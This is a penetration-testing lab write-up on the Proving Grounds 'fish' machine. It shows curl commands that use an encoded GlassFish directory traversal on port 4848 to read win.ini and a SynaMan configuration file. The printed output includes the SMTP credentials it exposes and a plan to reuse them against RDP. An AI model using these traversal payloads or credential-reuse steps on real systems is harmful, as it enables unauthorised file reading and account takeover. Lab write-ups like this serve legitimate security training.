InfoSec LAB

Fish_Exploitation

Created: 2 min read

Directory Traversal

A directory traversal vulnerability has been identified and exploitable on the GlassFish administration console on the target port 4848.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ LFI=$(echo -n '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../Windows/win.ini') ; curl -s "http://$IP:4848/theme/META-INF/prototype$LFI"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Confirmed

SynaMan

There is a vulnerable version of SynaMan instance running on the target port 6060 While no credential is known at this time, I can attempt to read the configuration file as the instance appears to suffer from CVE-2018-10814

According to the official documentation, The configuration file, AppConfig.xml, is located at the C:\Synaman\config directory by default in Windows installation.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ LFI=$(echo -n '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml') ; curl -s "http://$IP:4848/theme/META-INF/prototype$LFI"
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
	<parameters>
		<parameter name="adminEmail" type="1" value="admin@fish.pg"></parameter>
		<parameter name="smtpSecurity" type="1" value="None"></parameter>
		<parameter name="jvmPath" type="1" value="jre/bin/java"></parameter>
		<parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"></parameter>
		<parameter name="httpPortSSL" type="2" value="-1"></parameter>
		<parameter name="httpPort" type="2" value="0"></parameter>
		<parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"></parameter>
		<parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"></parameter>
		<parameter name="lastSelectedTab" type="1" value="1"></parameter>
		<parameter name="emailServerWebServicePort" type="2" value=""></parameter>
		<parameter name="imagePath" type="1" value="images/"></parameter>
		<parameter name="defaultOperation" type="1" value="frontPage"></parameter>
		<parameter name="publicIPForUrl" type="1" value=""></parameter>
		<parameter name="flags" type="2" value="2"></parameter>
		<parameter name="httpPort2" type="2" value="6060"></parameter>
		<parameter name="useUPnP" type="4" value="true"></parameter>
		<parameter name="smtpServer" type="1" value="mail.fish.pg"></parameter>
		<parameter name="smtpUser" type="1" value="arthur"></parameter>
		<parameter name="InitialSetupComplete" type="4" value="true"></parameter>
		<parameter name="disableCsrfPrevention" type="4" value="true"></parameter>
		<parameter name="failureOverHttpPort" type="2" value="55222"></parameter>
		<parameter name="smtpPort" type="2" value="25"></parameter>
		<parameter name="httpIP" type="1" value=""></parameter>
		<parameter name="emailServerWebServiceHost" type="1" value=""></parameter>
		<parameter name="smtpPassword" type="1" value="KingOfAtlantis"></parameter>
		<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
		<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
	</parameters>
</Configuration>

Checking the configuration file reveals a set of SMTP credential; arthur:KingOfAtlantis The credential might be used elsewhere. Validating against the target RDP server

Interactive Graph View

Backlinks